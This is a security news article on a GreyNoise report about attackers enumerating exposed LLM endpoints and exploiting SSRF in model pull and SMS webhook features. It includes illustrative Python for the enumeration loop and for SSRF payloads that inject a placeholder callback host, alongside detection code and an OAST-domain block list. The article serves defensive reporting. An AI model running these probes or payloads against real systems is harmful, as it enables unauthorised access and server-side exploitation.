Threat actors are orchestrating a widespread reconnaissance campaign targeting large language models (LLMs), potentially laying the groundwork for future cyberattacks on exposed AI models, according to a report from security researchers at GreyNoise. The attackers scanned for endpoints serving major LLM families, including OpenAI- and Google Gemini-compatible deployments, hunting for “misconfigured proxy servers that might leak access to commercial APIs.” GreyNoise’s honeypots recorded more than 80,000 enumeration requests from the threat actors.
The researchers highlighted that such extensive mapping of infrastructure suggests premeditated plans to exploit the vulnerabilities discovered. “If you’re running exposed LLM endpoints, you’re likely already on someone’s list,” they warned.
The reconnaissance effort began on December 28, when two IP addresses started systematically probing more than 73 distinct LLM endpoints. Within just 11 days, the attackers generated 80,469 sessions, employing deliberately innocuous test queries likely intended to identify responsive models without triggering security alerts.
The investigation revealed that the threat actors were targeting every prominent model family, including the following (a sketch of the probing pattern appears after the list):
- OpenAI (GPT-4o and variants)
- Anthropic (Claude Sonnet, Opus, Haiku)
- Meta (Llama 3.x)
- DeepSeek (DeepSeek-R1)
- Google (Gemini)
- Mistral
- Alibaba (Qwen)
- xAI (Grok)
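
That probing pattern maps onto a simple loop. The sketch below is illustrative only, assuming an OpenAI-compatible chat completions endpoint; the target URL, model identifiers, and prompt are placeholders, not indicators from the GreyNoise report.

```python
import requests

# Illustrative sketch of the enumeration pattern described above, assuming
# an OpenAI-compatible chat completions endpoint. The target URL, model
# names, and prompt are placeholders, not indicators from the report.
TARGET = "http://203.0.113.10:8000/v1/chat/completions"

MODEL_CANDIDATES = [
    "gpt-4o", "claude-3-5-sonnet", "llama-3.1-70b", "deepseek-r1",
    "gemini-1.5-pro", "mistral-large", "qwen2.5-72b", "grok-2",
]

for model in MODEL_CANDIDATES:
    try:
        resp = requests.post(
            TARGET,
            json={"model": model,
                  "messages": [{"role": "user", "content": "Hello!"}]},
            timeout=5,
        )
        # A 200 with a completion body reveals which model families the
        # proxy forwards, without a prompt that trips content filters.
        print(model, resp.status_code)
    except requests.RequestException:
        print(model, "no response")
```
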
The two IP addresses linked to the reconnaissance campaign are 45.88.186.70, associated with AS210558 (1337 Services GmbH), and 204.76.203.125, linked to AS51396 (Pfcloud UG). Both have histories of exploiting known vulnerabilities, including the “React2Shell” vulnerability, CVE-2025-55182, and the TP-Link Archer vulnerability, CVE-2023-1389.
Researchers concluded that the campaign reflects the actions of a professional threat actor engaging in reconnaissance activities to identify targets for cyberattacks. “The infrastructure overlap with established CVE scanning operations suggests this enumeration feeds into a larger exploitation pipeline,” they stated. “They’re building target lists.”
In a related development, a second campaign, this one aimed at exploiting server-side request forgery (SSRF) vulnerabilities, has also been identified. SSRF allows an attacker to compel a server to make outbound connections to attacker-controlled infrastructure. The attackers targeted the honeypot infrastructure’s model pull functionality by injecting malicious registry URLs, and also abused Twilio SMS webhook integrations by manipulating MediaUrl parameters.
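
The report does not publish the exact payloads, but the two injection points can be sketched roughly as follows. The paths assume an Ollama-style model pull API and a Twilio-style inbound SMS webhook; the target addresses and callback host are placeholders, not observed indicators.

```python
import requests

# Illustrative payload shapes only. The paths assume an Ollama-style model
# pull API and a Twilio-style inbound SMS webhook; target addresses and the
# callback host are placeholders for attacker-controlled infrastructure.
CALLBACK = "x7f3q.oast.example"  # placeholder out-of-band callback host

# 1) Model pull SSRF: the model "name" doubles as a registry URL, so the
#    server reaches out to the attacker's host to fetch the manifest.
requests.post(
    "http://203.0.113.20:11434/api/pull",
    json={"name": f"{CALLBACK}/library/some-model:latest"},
    timeout=5,
)

# 2) Twilio webhook SSRF: MediaUrl0 points at the attacker's host, so the
#    webhook handler fetches the "media" and thereby confirms the callback.
requests.post(
    "http://203.0.113.20/sms/webhook",
    data={"From": "+15550100", "Body": "hi",
          "MediaUrl0": f"https://{CALLBACK}/probe.png"},
    timeout=5,
)
```
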
Using ProjectDiscovery’s Out-of-band Application Security Testing (OAST) infrastructure, the attackers confirmed successful SSRF exploitation through callback validation. A single JA4H signature appeared in nearly all attacks, indicating the use of shared automation tools, likely Nuclei. A total of 62 source IPs across 27 countries were identified, but their consistent fingerprints suggest the use of VPS-based infrastructure rather than a botnet.
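
The clustering logic behind that observation is straightforward to express: if one JA4H fingerprint dominates traffic from many source IPs, the requests likely come from a single shared tool rather than diverse clients. A minimal sketch, where `events` stands in for parsed sensor logs and the field names and values are assumptions:

```python
from collections import defaultdict

# Count distinct source IPs per JA4H fingerprint. A fingerprint seen from
# many IPs suggests one shared automation tool behind the traffic.
events = [
    {"src_ip": "198.51.100.7", "ja4h": "ge11nn050000_placeholder"},
    {"src_ip": "198.51.100.8", "ja4h": "ge11nn050000_placeholder"},
    # ... thousands more parsed log events ...
]

ips_per_fingerprint = defaultdict(set)
for event in events:
    ips_per_fingerprint[event["ja4h"]].add(event["src_ip"])

for fp, ips in sorted(ips_per_fingerprint.items(), key=lambda kv: -len(kv[1])):
    print(f"{fp}: seen from {len(ips)} distinct source IPs")
```
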
Researchers assessed that this second campaign may have been the work of security researchers or bug bounty hunters, but noted that the scale and the timing around Christmas suggest “grey-hat operations pushing boundaries.” Together, the two campaigns underscore how systematically threat actors are mapping the expanding attack surface of AI deployments.
To mitigate these risks, GreyNoise recommends that organizations take proactive measures to secure their LLM deployments. This includes locking down model pulls to accept models only from trusted registries and implementing egress filtering to prevent SSRF callbacks from reaching attacker infrastructure. Organizations should also watch for enumeration patterns, alerting on rapid-fire requests that hit multiple model endpoints and on known fingerprinting queries such as “How many states are there in the United States?”
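
As a rough illustration of that detection heuristic, the sketch below flags a source that hits several distinct model endpoints within a short window, or that sends the known fingerprinting prompt. The thresholds and field names are assumptions, not GreyNoise’s published detection rules.

```python
import time
from collections import defaultdict, deque

# Alert when one source queries many distinct models in a short window, or
# sends a known fingerprinting prompt. Thresholds are illustrative.
WINDOW_SECONDS = 60
MODEL_THRESHOLD = 5
FINGERPRINT_PROMPTS = {"How many states are there in the United States?"}

recent = defaultdict(deque)  # src_ip -> deque of (timestamp, model)

def should_alert(src_ip: str, model: str, prompt: str) -> bool:
    now = time.time()
    window = recent[src_ip]
    window.append((now, model))
    # Drop observations that have aged out of the sliding window.
    while window and now - window[0][0] > WINDOW_SECONDS:
        window.popleft()
    distinct_models = {m for _, m in window}
    return len(distinct_models) >= MODEL_THRESHOLD or prompt in FINGERPRINT_PROMPTS
```
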
Moreover, blocking OAST domains at the DNS layer is advised to sever the callback channel that confirms successful exploitation. Rate-limiting traffic from suspicious ASNs is another protective measure, with AS152194, AS210558, and AS51396 appearing prominently in attack traffic. Continuous monitoring of JA4 fingerprints is also recommended to stay ahead of evolving tooling.
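
A minimal sketch of such a DNS-layer filter follows. The suffix list draws on publicly documented ProjectDiscovery OAST domains (interact.sh and the oast.* family); in production this logic would live in a resolver policy such as an RPZ or DNS firewall rather than application code.

```python
# Refuse to resolve names at or under known OAST callback suffixes. The
# list is a starting point drawn from ProjectDiscovery's public domains;
# extend it with locally observed callback infrastructure.
OAST_SUFFIXES = ("interact.sh", "oast.fun", "oast.pro", "oast.live", "oast.site")

def should_block(qname: str) -> bool:
    """Return True if the queried name falls under a known OAST suffix."""
    name = qname.rstrip(".").lower()
    return any(name == s or name.endswith("." + s) for s in OAST_SUFFIXES)

assert should_block("x7f3q.oast.fun")
assert not should_block("example.com")
```
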